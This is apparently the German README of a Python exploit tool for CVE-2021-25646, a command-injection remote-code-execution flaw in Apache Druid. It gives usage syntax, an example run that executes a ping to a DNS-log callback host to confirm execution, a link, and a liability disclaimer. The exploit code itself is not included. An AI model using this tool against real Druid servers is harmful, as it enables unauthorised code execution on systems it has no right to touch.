
Python-Exploit für die Remote-Code-Ausführung-Schwachstelle CVE-2021-25646 in Apache Druid, die eine Befehlsinjektion über manipulierte HTTP-Anfragen ermöglicht.
von j2ekim
python exp.py -u [--url] -c [--command]
python cve-2021-25646.py -u http://127.0.0.1:8888 -c "ping 5ap7ta.dnslog.cn"

https://www.adminxe.com/2109.html
Der Benutzer ist allein verantwortlich für alle direkten oder indirekten Folgen und Verluste, die durch die Verbreitung oder Nutzung dieses Tools entstehen. Der Autor übernimmt keinerlei Haftung.